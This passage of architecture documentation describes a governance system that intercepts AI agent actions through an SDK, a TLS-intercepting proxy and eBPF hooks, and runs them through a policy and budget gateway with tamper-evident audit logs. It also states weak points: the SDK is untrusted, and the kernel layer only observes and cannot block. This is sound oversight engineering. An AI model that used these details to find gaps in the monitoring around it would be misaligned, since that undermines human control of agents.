    GW --> API["aa-api<br/>HTTP :7700"]
    API --> Dash["dashboard / tooling"]

Start with System architecture.

System architecture

This page is the big-picture map of agent-assembly: the workspace crates, how the three interception layers feed one central gateway, and which transport each component speaks. Read it first; the component deep-dives, key workflows, and data flows pages zoom into each piece.

For the trust-boundary view of the same system — what each layer is trusted to do and where the authoritative checks live — see the Security Model.

The one-sentence model

Agents act; the three interception layers observe those actions and forward them to the gateway; the gateway evaluates policy, tracks budgets, and writes an audit record before returning allow or deny.

The gateway is the single decision-maker. The interception layers differ only in where they sit and how much they can bypass — they all converge on the same protobuf wire format defined in aa-proto and the same PolicyService RPC.

Workspace at a glance

The Cargo workspace declares 28 member crates in the top-level Cargo.toml. They group into a handful of architectural roles:

Role	Crates	What they own
Foundation	`aa-core`, `aa-proto`, `aa-security`	Domain types (`AgentId`, `AuditEntry`, policy types), the gRPC/protobuf wire schema, and the credential scanner / redaction primitives.
Storage	`aa-storage`, `aa-storage-memory`, `aa-storage-postgres`, `aa-storage-redis`, `aa-storage-sqlite-buffer`, `aa-cache`	Storage trait facade + pluggable drivers, plus the in-process L1 cache.
Runtime / interception	`aa-runtime`, `aa-ebpf`, `aa-ebpf-common`, `aa-proxy`, `aa-sdk-client`, `aa-wasm`, `aa-sandbox`	The per-agent runtime chokepoint, the kernel/proxy/SDK interception layers, the FFI-agnostic SDK client, and the WASM tool sandbox.
Control plane	`aa-gateway`, `aa-api`, `aa-cli`	The governance gateway (gRPC), the HTTP/OpenAPI read API, and the `aasm` operator CLI.
Dev-tool adapters	`aa-devtool`, `aa-devtool-claude-code`, `aa-devtool-codex`, `aa-devtool-copilot`, `aa-devtool-windsurf`, `aa-devtool-saas`, plus the `examples/aa-devtool-sample-myeditor` sample	Adapters that wire common AI dev tools into the governance fabric.
Test / conformance	`conformance`, `aa-integration-tests`	The cross-crate trait conformance harness and the end-to-end integration suite.

Two further eBPF crates — aa-ebpf-probes and aa-ebpf-programs — live alongside the workspace but are intentionally out of workspace: they compile for the bpfel-unknown-none BPF target and are built by aa-ebpf’s build.rs via aya-build, so they cannot be selected with cargo -p.

The per-language SDK shims (Python / Node / Go) do not live in this monorepo. They wrap aa-sdk-client and consume it via a pinned git SHA from the sibling python-sdk / node-sdk / go-sdk repositories.

Crate / component map

The diagram highlights the core architectural crates; storage drivers, dev-tool adapters, and test harnesses are folded into summary nodes for clarity. Edges follow real path dependencies in each crate’s Cargo.toml.

graph TD
    classDef foundation fill:#e8f1ff,stroke:#5b8def
    classDef storage fill:#eef6ff,stroke:#5b8def
    classDef ebpf fill:#fdecea,stroke:#d75748
    classDef ffi fill:#eaf6ee,stroke:#3aa55b
    classDef control fill:#fff3d6,stroke:#c98a00
    classDef outOfWorkspace fill:#fdecea,stroke:#d75748,stroke-dasharray: 5 3

    %% Foundation
    aa_proto[aa-proto<br/><i>wire schema</i>]:::foundation
    aa_core[aa-core<br/><i>domain types</i>]:::foundation
    aa_security[aa-security<br/><i>scanner / redaction</i>]:::foundation

    %% Storage
    aa_storage[aa-storage<br/><i>trait facade</i>]:::storage
    aa_cache[aa-cache<br/><i>L1 cache</i>]:::storage
    storage_drivers["aa-storage-{memory,postgres,<br/>redis,sqlite-buffer}"]:::storage

    %% Interception / runtime
    aa_runtime[aa-runtime<br/><i>per-agent chokepoint</i>]:::ffi
    aa_sdk_client[aa-sdk-client<br/><i>FFI-agnostic client</i>]:::ffi
    aa_wasm[aa-wasm]:::ffi
    aa_sandbox[aa-sandbox<br/><i>WASI tool sandbox</i>]:::ffi
    aa_proxy[aa-proxy<br/><i>L2 sidecar</i>]:::ebpf
    aa_ebpf[aa-ebpf<br/><i>L3 kernel</i>]:::ebpf
    aa_ebpf_common[aa-ebpf-common]:::ebpf
    aa_probes["aa-ebpf-probes /<br/>aa-ebpf-programs<br/><i>out-of-workspace BPF</i>"]:::outOfWorkspace

    %% Control plane
    aa_gateway[aa-gateway<br/><i>gRPC 50051</i>]:::control
    aa_api[aa-api<br/><i>HTTP / OpenAPI</i>]:::control
    aa_cli[aa-cli<br/><i>aasm</i>]:::control

    aa_core --> aa_security
    aa_storage --> aa_core
    aa_cache --> aa_core
    storage_drivers --> aa_storage

    aa_runtime --> aa_core
    aa_runtime --> aa_proto
    aa_runtime --> aa_ebpf
    aa_sdk_client --> aa_proto
    aa_sdk_client -. preflight .-> aa_security
    aa_wasm --> aa_core

    aa_ebpf --> aa_core
    aa_ebpf --> aa_ebpf_common
    aa_probes --> aa_ebpf_common

    aa_proxy --> aa_core
    aa_proxy --> aa_proto
    aa_proxy --> aa_runtime
    aa_proxy --> aa_sandbox

    aa_gateway --> aa_core
    aa_gateway --> aa_proto
    aa_gateway --> aa_runtime
    aa_gateway --> aa_storage
    aa_gateway --> aa_cache
    aa_api --> aa_core
    aa_api --> aa_gateway
    aa_api --> aa_runtime
    aa_cli --> aa_core
    aa_cli --> aa_gateway

aa-core and aa-proto are the two foundation leaves everything else builds on: aa-core holds the Rust domain model and the storage traits, aa-proto holds the protobuf schema that crosses every process boundary.

How the layers, gateway, API, runtime, and storage fit together

flowchart TB
    subgraph agent_host["Agent host"]
        Agent[AI agent process]
        subgraph layers["Three interception layers"]
            L1["L1 — In-process SDK<br/>(aa-sdk-client shims, aa-wasm)"]
            L2["L2 — Sidecar proxy<br/>(aa-proxy)"]
            L3["L3 — eBPF<br/>(aa-ebpf, kernel)"]
        end
        RT["aa-runtime<br/>per-agent chokepoint"]
    end

    subgraph control["Control plane"]
        GW["aa-gateway<br/>registry · policy · budget · audit"]
        API["aa-api<br/>HTTP / OpenAPI read API"]
    end

    subgraph persistence["Storage"]
        STORE[("aa-storage drivers<br/>memory / postgres / redis / sqlite-buffer")]
    end

    Dash["Dashboard / operators"]
    CLI["aasm CLI"]

    Agent --> L1 & L2 & L3
    L1 -->|UDS IpcFrame| RT
    L2 -->|forward| RT
    L3 -->|ring buffer| RT
    RT -->|gRPC PolicyService.CheckAction<br/>:50051| GW
    GW --> STORE
    API --> GW
    Dash -->|HTTP / WS| API
    CLI -->|gRPC| GW

The interception layers are deployment-independent: a deployment can run any subset (SDK only, SDK + proxy, all three). Each layer turns an agent action into an event in the aa-proto schema.
aa-runtime is the per-agent chokepoint. Because the SDK is untrusted, the runtime re-scans every event (the enforcement stage in aa-runtime/src/pipeline/enforcement.rs) before forwarding it.
aa-gateway is the brain. It hosts the agent registry, the policy engine, per-team budgets, and the audit pipeline, and it serves gRPC on :50051.
aa-api depends on aa-gateway in-process and re-exposes its read surfaces over HTTP with an OpenAPI schema (via utoipa) for the dashboard and tooling.
Storage is a pluggable trait facade (aa-storage) with swappable drivers, fronted by an in-process L1 cache (aa-cache).

Transport topology

Every cross-process message rides one of three transports. All gRPC and Unix-socket payloads share the aa-proto schema.

flowchart LR
    SDK["SDK shim<br/>(aa-sdk-client)"] -- "UDS IpcFrame" --> RT["aa-runtime"]
    RT -- "gRPC :50051" --> GW["aa-gateway"]
    PROXY["aa-proxy"] -- "gRPC :50051" --> GW
    EBPF["aa-ebpf"] -- "ring buffer → events" --> RT
    GW -- "in-process dep" --> API["aa-api"]
    DASH["Dashboard"] -- "HTTP / OpenAPI :7700" --> API
    CLI["aasm CLI"] -- "gRPC :50051" --> GW

Transport	Default endpoint	Carries	Who speaks it
gRPC	`127.0.0.1:50051` (TCP) or UDS	`PolicyService`, `AuditService`, `AgentLifecycleService`, `TopologyService`, `ApprovalService`, `SecretsService`, `InvalidationService`	`aa-runtime`, `aa-proxy`, `aa-cli` → `aa-gateway`
HTTP / OpenAPI	`127.0.0.1:7700` (`AA_API_ADDR`)	Read APIs: registry, topology, audit, costs, alerts, traces	Dashboard / tooling → `aa-api`
Unix domain socket (UDS)	per-agent socket	`IpcFrame` events from the in-process SDK	SDK shim → `aa-runtime`

The seven gRPC services are registered together in aa-gateway/src/server.rs; the gateway can serve them over either TCP (serve_tcp) or a Unix socket (serve_uds). The default gRPC listen address is 127.0.0.1:50051; the HTTP API default bind is 127.0.0.1:7700 (constant DEFAULT_ADDR in aa-api/src/config.rs, overridable via AA_API_ADDR).

Where to go next

Component deep-dives — per-crate responsibilities, key types, and dependencies.
Key workflows — policy evaluation, agent registration, budget rollup, and the enforcement path as sequence diagrams.
Data flows — how an intercepted event travels from a layer through the gateway to the audit log and storage.
Security Model — the same system viewed through trust boundaries and defense-in-depth.

Last updated: 2026-06-11 by Chisanan232

Component deep-dives

This page walks the major crates one by one: what each owns, its key types, and who it depends on. For the bird’s-eye map and the dependency diagram, start with System architecture.

All paths link into the master tree on GitHub.

`aa-gateway` — the governance brain

aa-gateway is the central decision-maker. It hosts the agent registry, the policy engine, per-team budgets, the audit pipeline, approvals, anomaly detection, and the seven gRPC services. Its module tree is large; the load-bearing sub-modules are:

Module	Responsibility
`registry/`	Agent registry — `AgentRecord` / `AgentRegistry` backed by `DashMap`, lineage, orphan handling, token issuance, storage bridge.
`policy/`	The policy engine (parse → validate → compile → evaluate). See below.
`budget/`	Per-agent and per-team spend tracking, pricing tables, and rollup. See below.
`engine/`	Decision caching, rate limiting, scope index, and the policy file watcher.
`service/`	gRPC service impls: `policy_service`, `audit_service`, `lifecycle_service`, `topology_service`, `approval_service`, `secrets_service`.
`audit.rs`, `audit_consumer.rs`, `audit_reader.rs`	The audit write path (`AuditWriter`), the NATS JetStream consumer, and the read API.
`sanitizer/`	The write-boundary `sanitize()` pass that drops “never store” data before persistence.
`invalidation/`	The push-invalidation hub that broadcasts policy/approval changes to subscribers.
`anomaly/`, `approval/`, `edges/`, `iam/`, `secrets/`, `ops/`	Anomaly baselines + responder, human-in-the-loop approvals, cross-team edge tracking, IAM, secret dispatch, and in-flight ops.
`server.rs`	Registers all seven services and serves over TCP (`serve_tcp`) or UDS (`serve_uds`).

Key types: AgentRecord, AgentRegistry, AgentStatus (registry/store.rs). Depends on: aa-core, aa-proto, aa-runtime, aa-storage, aa-cache. Serves: gRPC on 127.0.0.1:50051.

The policy engine (`aa-gateway/src/policy/`)

The engine turns a YAML/TOML policy bundle into a decision. Entry point is validator::PolicyValidator::from_yaml.

Module	Role
`raw.rs`	Deserialise the policy bundle (raw, untyped shape).
`validator.rs`	Structural validation → `PolicyValidator`, `PolicyValidatorOutput`.
`expr.rs`	Compile rule predicates into a typed expression tree.
`document.rs`	The evaluated `PolicyDocument` and its scoped policies (`ToolPolicy`, `NetworkPolicy`, `BudgetPolicy`, `DataPolicy`, `SchedulePolicy`).
`scope.rs`	`PolicyScope` plus `OrgId` / `TeamId` — the org → team → agent → tool cascade.
`network.rs`	`check_network_egress` → `EgressDecision` for L2 proxy egress checks.
`rbac.rs`	`required_role_for`, `CallerRole`, `MutationKind` — who may mutate which scope.
`history/`, `context.rs`, `error.rs`	Version history, evaluation context, and the `PolicyParseError` / `ValidationError` types.

The evaluation flow is detailed on the Key workflows page.

Budgets (`aa-gateway/src/budget/`)

Module	Role
`tracker.rs`	`BudgetTracker` — per-agent / per-team / global spend, daily + monthly windows, alert thresholds at 80 % / 95 %.
`pricing.rs`	`PricingTable` — per-model cost tables used to price an action.
`rollup.rs`	`BudgetRollup` / `BudgetRow` — composes agent / team / org / subtree rows for the dashboard, SDK, and CLI.
`persistence.rs`, `types.rs`	Durable budget state and the `BudgetAlert` / `BudgetState` / `BudgetWindow` types.

A request that would breach a budget downgrades from allow to deny. See budget tracking & rollup.

`aa-runtime` — the per-agent chokepoint

aa-runtime sits between an agent’s interception layers and the gateway. It is the mandatory chokepoint on the SDK fast-path (SDK → UDS → runtime → gateway). Because the SDK is untrusted, the runtime re-scans every event before forwarding.

Module	Role
`layer.rs`	`LayerDetector` / `LayerSet` bitflags — detects which of eBPF / proxy / SDK layers are active at startup.
`ipc/`	UDS server, length-prefixed `IpcFrame` codec, and the `ResponseRouter`.
`pipeline/`	Event aggregation: receive `IpcFrame`s, enrich, batch, fan out; the `enforcement.rs` scan/redact stage; `metrics.rs`.
`pipeline/enforcement.rs`	The authoritative scan/redact stage — fail-closed, oversized fields redacted whole, no `already_scanned` wire marker is honoured.
`gateway_client.rs`	Optional gRPC `PolicyServiceClient` forwarding `CheckAction` to the gateway.
`ebpf_bridge.rs`	Bridges eBPF ring-buffer events into the pipeline.
`l1_cache.rs`, `policy.rs`	Local policy cache + `PolicyRules` for offline / local-mode decisions.
`approval.rs`, `approval_sink.rs`	Approval queue and the `wait_for_approval` sink (timeout ⇒ `Decision::Pending`).
`invalidation_client.rs`	Subscribes to the gateway’s push-invalidation stream.
`audit_publisher/`, `correlation/`, `health/`	NATS audit publishing, correlation IDs, and health checks.

Key types: LayerSet, EnforcementConfig, PipelineEvent, EnrichedEvent. Depends on: aa-core, aa-proto, aa-ebpf.

The three interception layers

L1 — In-process SDK: `aa-sdk-client` (+ `aa-wasm`)

aa-sdk-client is the FFI-agnostic SDK runtime client. The per-language shims (Python / Node / Go, in their own repos) are thin wrappers over it.

Module	Role
`config.rs`	Resolve gateway endpoint / socket path / agent identity.
`codec.rs`	Wire codec for `IpcFrame` framing.
`ipc.rs`	UDS transport to `aa-runtime`.
`client.rs`	Lifecycle + send-event surface.
`preflight.rs`	Optional, feature-gated advisory credential preflight using `aa-security`.
`error.rs`	Client error taxonomy.

aa-wasm is a separate in-workspace target compiling governance components to WebAssembly (via wasm-bindgen) for browser / edge agents without a native sidecar.

Trust note: the SDK is not a security boundary — anything it asserts is re-verified by aa-runtime. See trust boundaries.

L2 — Sidecar proxy: `aa-proxy`

Intercepts outbound HTTPS via MitM with a per-host CA, enforcing network-egress policy without code changes.

Module	Role
`tls/`	Per-host CA (`ca.rs`), leaf-cert minting (`cert.rs`), OS keychain integration (`keychain.rs`).
`intercept/`	Detect, extract, and classify intercepted requests (`detect.rs`, `extract.rs`, `event.rs`), including MCP traffic (`mcp.rs`).
`proxy/`	The HTTP forwarding core (`http.rs`).
`mcp_enforce.rs`	MCP-specific enforcement.
`audit_jsonl.rs`	Local JSONL audit fallback.

Depends on: aa-core, aa-proto, aa-runtime, aa-sandbox.

L3 — eBPF: `aa-ebpf` (+ `aa-ebpf-common`, out-of-workspace probes)

Kernel hooks watching SSL libraries (uprobes) and process exec / file syscalls. Linux-only, lowest bypass risk.

Module	Role
`loader.rs`, `maps.rs`, `ringbuf.rs`	Load BPF programs, manage maps, drain the ring buffer to userspace.
`uprobe.rs`	Attach `SSL_write` / `SSL_read` uprobes to OpenSSL for plaintext capture.
`kprobe.rs`, `kprobes/`, `tracepoint.rs`, `syscall.rs`	Process exec / file syscall hooks.
`agent_discover.rs`, `lineage.rs`, `shell_detect.rs`	Discover governed processes, track lineage, detect shells.
`events.rs`, `alert.rs`, `error.rs`	Event types, alerts, error taxonomy.

aa-ebpf-common holds types shared between userspace and the BPF programs. aa-ebpf-probes / aa-ebpf-programs are the out-of-workspace BPF-target crates built by aa-ebpf/build.rs via aya-build.

Depends on: aa-core, aa-ebpf-common.

`aa-api` — the HTTP / OpenAPI read API

aa-api depends on aa-gateway in-process and re-exposes its read surfaces over HTTP (Axum) with an OpenAPI schema (utoipa). It is the dashboard’s backend.

Module	Role
`routes/`	One module per resource: `agents`, `topology`, `policies`, `audit`, `costs`, `alerts`, `traces`, `approvals`, `edges`, `iam`, `dispatch`, `tools`, `destinations`, `logs`, `ops`, `admin`, `auth`, `capability`.
`openapi.rs`	The generated OpenAPI document.
`ws/`, `events.rs`	WebSocket streaming + server-sent events for live dashboard updates.
`middleware/`, `auth/`	Request middleware and authentication.
`trace_store.rs`, `replay.rs`, `pagination.rs`	Trace storage, replay, and paged responses.
`server.rs`, `config.rs`	Axum server bootstrap; default bind `127.0.0.1:7700` (`DEFAULT_ADDR`, overridable via `AA_API_ADDR`).

Depends on: aa-core, aa-gateway, aa-runtime.

`aa-cli` — the `aasm` operator front-end

aa-cli ships the aasm binary. It talks gRPC to the gateway and HTTP to the API. Common subcommands: aasm status, aasm topology, aasm policy, aasm agent, aasm cost, aasm audit, aasm dashboard (TUI). The full surface is documented in the CLI Reference.

Depends on: aa-core, aa-gateway.

Foundation crates

`aa-core` — domain model + storage traits

The leaf everything builds on. Holds the Rust domain types and the storage trait contracts (std-gated).

Area	Contents
`identity.rs`	`AgentId` — an opaque 16-byte identity newtype.
`types/`	The wire domain types: `types::AgentId` (a `String` wire id, distinct from `identity::AgentId`), `AuditEvent`, `Credential`, `SessionCtx`, policy types.
`audit.rs`	`AuditEntry` — hash-chained, tamper-evident audit record.
`policy.rs`, `capability.rs`, `risk_tier.rs`, `dev_tool.rs`	Policy types, capability model, `RiskTier`, `GovernanceLevel`.
`storage/`	The six storage traits (`PolicyStore`, `AuditSink`, `CredentialStore`, `LifecycleStore`, `SessionStore`, `RateLimitCounter`), `StorageError`, and a `conformance` harness.
`topology/`, `evaluators.rs`, `time.rs`, `config.rs`	Topology edges + cycle detection, evaluators, time abstractions, config.

`aa-proto` — the wire schema

Protobuf definitions (under proto/, package prefix assembly.*.v1) compiled with prost / tonic. Defines the seven gRPC services and all wire messages. Every cross-process payload — gRPC and UDS alike — uses these types.

`aa-security` — credential scanner + redaction

A small leaf crate (only aho-corasick + serde) holding CredentialScanner, CredentialFinding, and Redaction. Extracted out of aa-core so both the runtime enforcement stage and the SDK preflight can depend on it without pulling in the full core.

Storage & cache

`aa-storage` — trait facade + driver registry

aa-storage re-exports the aa_core::storage traits and adds the runtime driver registry: StorageConfig, a Registry, factory traits, ConfigError, and register_builtin_drivers (memory / redis / postgres). It is the loader the CLI’s aasm config validate / aasm config boot exercise.

Storage drivers

Crate	Backend	Notable deps
`aa-storage-memory`	In-process `DashMap` / `parking_lot`	none beyond `aa-storage` + `aa-core`
`aa-storage-postgres`	PostgreSQL via `sqlx`	`sqlx` (postgres), `testcontainers-modules`
`aa-storage-redis`	Redis via `redis` + `deadpool-redis`	builds on `aa-storage-memory` for session fallback
`aa-storage-sqlite-buffer`	Local SQLite write-buffer	`rusqlite` (bundled) — pinned to share `libsqlite3-sys` with `sqlx-sqlite`

Each driver implements the aa-core storage traits and is verified against the shared conformance harness.

`aa-cache` — in-process L1 cache

L1Cache<S: CacheSource> — a DashMap-backed, TTL’d, cache-aside wrapper over any store. Concurrent misses for the same key collapse to a single backend load (stampede protection). The gateway fronts its policy store with this cache.

WASM tool sandbox: `aa-sandbox`

aa-sandbox hosts a wasmtime-based runtime that executes WASM-marked tools. It enforces three isolation surfaces — filesystem allowlist (WASI preopened dirs), CPU budget (wasmtime instruction fuel), and memory ceiling (Store limiter) — each surfaced as a deterministic SandboxError. It is consumed by aa-proxy via the tool-dispatch surface.

Test / conformance crates

conformance — the cross-crate trait conformance harness; every storage driver runs the same suite.
aa-integration-tests — end-to-end tests that wire multiple crates together (kept separate to avoid dependency cycles).

Last updated: 2026-06-11 by Chisanan232

Key workflows

This page traces the four workflows that define agent-assembly’s runtime behaviour, each grounded in the real code path:

Policy evaluation
Agent registration
Budget tracking & rollup
Interception & enforcement

For component-level detail behind each box, see Component deep-dives; for the bird’s-eye map, see System architecture.

Policy evaluation

When aa-gateway receives a PolicyService.CheckAction RPC, the policy engine under aa-gateway/src/policy/ walks parse → compile → scope cascade → budget → decision, then audits the result. The decision type (engine/decision.rs) is one of Allow, Deny, or RequireApproval.

flowchart TD
    Req["CheckActionRequest<br/>(action, target, labels)"] --> Cache{Decision<br/>cache hit?<br/>engine/cache.rs}
    Cache -->|hit| Resp
    Cache -->|miss| Parse["policy/raw.rs<br/>deserialise bundle"]
    Parse --> Validate["policy/validator.rs<br/>structural validation"]
    Validate --> Compile["policy/expr.rs<br/>compile predicates"]
    Compile --> Cascade["policy/document.rs + scope.rs<br/>org → team → agent → tool<br/>most-restrictive-wins"]
    Cascade --> Budget["budget/tracker.rs<br/>check team budget"]
    Budget --> Decide{PolicyDecision}
    Decide -->|Allow| Audit
    Decide -->|Deny| Audit
    Decide -->|RequireApproval| Approval["approval queue<br/>(timeout ⇒ Pending)"]
    Approval --> Audit
    Audit["audit.rs<br/>append hash-chained entry"] --> Resp["CheckActionResponse"]

Decision cache — engine/cache.rs short-circuits repeat lookups for the same (scope, action) key.
Parse + validate — policy/raw.rs deserialises the active bundle; policy/validator.rs enforces structural invariants (well-formed scopes, unique rule names).
Compile — policy/expr.rs turns rule predicates into a typed expression tree evaluated against the request’s ActionType, target, and labels.
Scope cascade — policy/document.rs + scope.rs walk org → team → agent → tool and merge most-restrictive-wins, with cycle detection on delegation.
Budget check — budget/tracker.rs (priced via budget/pricing.rs) downgrades an otherwise-allowed request to Deny if it would breach a budget.
Decision — engine/decision.rs yields Allow, Deny { reason }, or RequireApproval { timeout_secs }.
Audit — every decision is appended to the hash-chained audit log via audit.rs before the response is returned.

Latency targets and current p99 measurements live in Benchmarks — Policy Check p99.

Agent registration

Registration flows through AgentLifecycleService.Register (aa-gateway/src/service/lifecycle_service.rs), which validates delegation depth and writes into the DashMap-backed AgentRegistry. Agents then keep their record live with periodic Heartbeats.

sequenceDiagram
    autonumber
    participant Agent
    participant RT as aa-runtime
    participant LS as AgentLifecycleService<br/>(aa-gateway)
    participant Reg as AgentRegistry<br/>(registry/store.rs)
    participant Store as Storage<br/>(storage_bridge.rs)

    Agent->>RT: start with agent identity + parent
    RT->>LS: gRPC Register(RegisterRequest)
    LS->>LS: validate delegation depth<br/>(≤ DEFAULT_MAX_AGENT_DEPTH = 10)
    alt depth OK and not already registered
        LS->>Reg: insert AgentRecord (status Active)
        Reg->>Store: persist via storage bridge
        LS-->>RT: RegisterResponse (token)
    else already registered / depth exceeded
        LS-->>RT: AlreadyExists / FailedPrecondition
    end

    loop heartbeat interval
        RT->>LS: Heartbeat(HeartbeatRequest)
        LS->>Reg: refresh last-seen, recent events
        LS-->>RT: HeartbeatResponse (control commands?)
    end

Delegation depth — a sub-agent’s depth must not exceed DEFAULT_MAX_AGENT_DEPTH (10); over-deep registrations are rejected.
Lineage — the registry records parent/child links (registry/lineage.rs) so the topology tree and orphan handling (registry/orphan.rs) work.
Control stream — ControlStream lets the gateway push commands (e.g. SuspendCommand) back to a live agent.
Deregister — on shutdown the agent calls Deregister; orphaned children are handled per the configured OrphanMode.

Budget tracking & rollup

Every priced action updates the in-memory BudgetTracker; the dashboard, SDK, and CLI read a composed BudgetRollup across agent / team / org / subtree scopes.

flowchart LR
    subgraph track["Tracking (write path)"]
        Action["priced action<br/>(model + tokens)"] --> Price["budget/pricing.rs<br/>PricingTable"]
        Price --> Tracker["budget/tracker.rs<br/>BudgetTracker"]
        Tracker --> Windows["daily + monthly windows<br/>per agent / team / global"]
        Windows --> Alert{"≥ 80% / 95%?"}
        Alert -->|yes| Broadcast["BudgetAlert<br/>(broadcast channel)"]
    end

    subgraph roll["Rollup (read path)"]
        Req["GET /agents/{id}/budget<br/>or aasm policy show --show-budget"] --> Rollup["budget/rollup.rs<br/>BudgetRollup"]
        Rollup --> Rows["BudgetRow[]<br/>agent · team · org · subtree"]
    end

    Tracker -. read-only accessors .-> Rollup

Pricing — budget/pricing.rs converts model + token counts into a USD cost.
Windows — BudgetTracker keeps daily and monthly windows for each agent, each team, and the global total.
Alerts — crossing 80 % or 95 % of a limit emits a BudgetAlert on a broadcast channel (capacity 64) for live dashboards.
Rollup — budget/rollup.rs composes a BudgetRow per scope (agent, team:<id>, org, subtree) using the tracker’s read-only accessors — narrowest scope first. The same rollup drives both the HTTP endpoint and aasm policy show <agent_id> --show-budget.

Interception & enforcement

An agent action is observed by one of the three layers, normalised into the aa-proto wire format, re-scanned by aa-runtime, then sent to the gateway for a decision. The runtime is the mandatory chokepoint: it never trusts the SDK’s assertions.

sequenceDiagram
    autonumber
    participant Agent
    participant SDK as L1 SDK shim<br/>(aa-sdk-client)
    participant Proxy as L2 proxy<br/>(aa-proxy)
    participant eBPF as L3 eBPF<br/>(aa-ebpf)
    participant RT as aa-runtime<br/>pipeline + enforcement
    participant GW as aa-gateway<br/>PolicyService

    alt L1 — in-process
        Agent->>SDK: tool / LLM / network call
        SDK->>RT: UDS IpcFrame (event)
    else L2 — sidecar
        Agent->>Proxy: outbound HTTPS (MitM)
        Proxy->>RT: forwarded event
    else L3 — kernel
        Agent-->>eBPF: SSL_write / exec / file syscall
        eBPF->>RT: ring-buffer event
    end

    RT->>RT: enrich (pipeline/event.rs)
    RT->>RT: scan + redact (pipeline/enforcement.rs)<br/>fail-closed, oversized ⇒ redact whole
    RT->>GW: CheckAction(CheckActionRequest)
    GW-->>RT: Allow / Deny / RequireApproval
    alt Allow
        RT-->>Agent: pass-through
    else Deny
        RT-->>Agent: error / blocked
    else RequireApproval
        RT->>RT: approval_sink.wait_for_approval<br/>(timeout ⇒ Decision::Pending)
        RT-->>Agent: allow or block on resolution
    end

Key invariants from aa-runtime/src/pipeline/enforcement.rs:

The runtime re-scans every event unconditionally — there is no already_scanned / clean wire marker, and none is honoured.
Enforcement is fail-closed: a field larger than max_field_bytes (default 64 KiB) cannot be fully scanned, so it is redacted whole ([REDACTED:OVERSIZED]) rather than partially forwarded.
The credential scanner / redaction primitives come from the aa-security leaf crate.

The eBPF layer is observe-and-forward for bypass-detection: it cannot block in-kernel, so it streams audit events while the SDK and proxy layers carry the synchronous allow/deny. For the trust rationale, see three-layer defense.

Where each event goes next

Once a decision is made, the event flows into the audit and storage pipeline — covered in detail on the Data flows page.

Last updated: 2026-06-11 by Chisanan232

Data flows

This page follows the data — not the control decisions — through the system: how an intercepted event becomes a decision, then a durable, tamper-evident audit record. For the decision logic itself, see Key workflows; for the trust view, see the Security Model.

End-to-end: layer → gateway → policy → audit → storage

flowchart TD
    subgraph layers["Interception layers"]
        L1["L1 SDK<br/>(aa-sdk-client)"]
        L2["L2 proxy<br/>(aa-proxy)"]
        L3["L3 eBPF<br/>(aa-ebpf)"]
    end

    subgraph runtime["aa-runtime"]
        IPC["ipc/ — UDS IpcFrame"]
        PIPE["pipeline — enrich + batch"]
        ENF["enforcement — scan + redact<br/>(fail-closed)"]
        PUB["audit_publisher — NATS"]
    end

    subgraph gateway["aa-gateway"]
        POL["PolicyService.CheckAction"]
        AW["AuditWriter (audit.rs)<br/>append-only JSONL"]
        SAN["sanitizer/ — sanitize()<br/>drop 'never store' data"]
        CONS["audit_consumer.rs<br/>JetStream pull-consumer"]
    end

    NATS[("NATS JetStream<br/>assembly.audit.>")]
    JSONL[("per-session JSONL<br/>tamper-evident")]
    PG[("aa-storage-postgres<br/>audit_logs")]

    L1 -->|IpcFrame| IPC
    L2 -->|event| IPC
    L3 -->|ring buffer| IPC
    IPC --> PIPE --> ENF
    ENF --> POL
    ENF --> PUB
    POL -->|decision| AW
    AW --> JSONL
    AW -. dual sink .-> PG
    PUB -->|publish| NATS
    NATS --> CONS
    CONS --> SAN --> PG

There are two paths an audit record can take, and the design is deliberately layered so neither is a single point of failure:

Synchronous decision audit (in-gateway). Every CheckAction decision is appended by AuditWriter (aa-gateway/src/audit.rs) as one JSON line to a per-session JSONL file. The JSONL file is the tamper-evident primary record (hash-chained AuditEntry). When a durable StorageBackend is configured, the writer follows each JSONL append with storage.append_audit_event(...) (the dual-sink path); a storage failure is logged but never stops the pipeline, and a restart can replay missed entries from the JSONL file.
Asynchronous event stream (via NATS). aa-runtime’s audit_publisher publishes audit records to the NATS subject assembly.audit.<tenant>.<agent> and returns control to the agent immediately (fire-and-forget). The gateway’s audit_consumer is a durable JetStream pull-consumer over assembly.audit.> that batches, sanitises, and persists to Postgres.

The audit write path in detail

sequenceDiagram
    autonumber
    participant RT as aa-runtime<br/>audit_publisher
    participant NATS as NATS JetStream<br/>assembly.audit.>
    participant Cons as audit_consumer.rs<br/>(producer task)
    participant Chan as bounded mpsc
    participant Writer as audit_consumer.rs<br/>(DB-writer task)
    participant San as sanitizer::sanitize
    participant PG as audit_logs<br/>(Postgres)

    RT->>NATS: publish AuditEvent (fire-and-forget)
    NATS->>Cons: deliver (pull-consumer, AckPolicy::All)
    Cons->>Chan: send().await (backpressure, never drop)
    Chan->>Writer: drain up to batch_size
    loop per batch
        Writer->>San: sanitize(RawAuditEvent)
        San-->>Writer: SanitizedAuditEvent / HeartbeatUpdate
        Writer->>PG: multi-row INSERT … ON CONFLICT (event_id) DO NOTHING
        Writer->>NATS: ack last message (acks whole batch)
    end

Properties enforced by aa-gateway/src/audit_consumer.rs:

Batching — the writer drains the channel into batches and writes each with a single multi-row INSERT, one DB round-trip and one ack per batch.
Idempotency — each event becomes an AuditLogRecord keyed by its own event_id; ON CONFLICT (event_id) DO NOTHING dedupes retries and intra-batch repeats (bumping aa_audit_duplicates_total).
At-least-once — AckPolicy::All acks the batch’s last message only after the whole batch persists; a failed batch is left un-acked so NATS redelivers after ack_wait.
Backpressure — the channel is bounded; a full channel makes the producer await room rather than drop, so bursts queue durably in JetStream (aa_audit_consumer_channel_depth exposes the in-flight depth).

The write-boundary sanitizer

Before anything reaches audit_logs, the consumer runs the write-boundary sanitize() pass (aa-gateway/src/sanitizer/). The sanitizer is the last line of defense and never trusts the inbound shape — it operates on the untyped JSON tree as received:

flowchart LR
    Raw["RawAuditEvent<br/>(untyped JSON)"] --> Strip["strip banned keys<br/>recursively"]
    Strip --> Drop["drop unknown top-level fields<br/>(count them as a metric)"]
    Drop --> Beat{"heartbeat?"}
    Beat -->|yes| Collapse["collapse into<br/>HeartbeatUpdate<br/>(last-seen, not per-beat)"]
    Beat -->|no| Out["SanitizedAuditEvent"]
    Collapse --> Out

Four classes of “never store” data are dropped at this boundary regardless of what an upstream SDK or proxy emitted: raw LLM prompts / completions, full tool-call payloads, eBPF packet bodies, and per-heartbeat sequence records. Counting unknown fields means a newly-emitting sender is noticed rather than silently persisted.

Two-layer defense: the sender (runtime enforcement) is the first line — it scans and redacts before forwarding; the sanitizer is the last line — it strips before persisting. Neither trusts the other. See trust boundaries.

Storage data flow

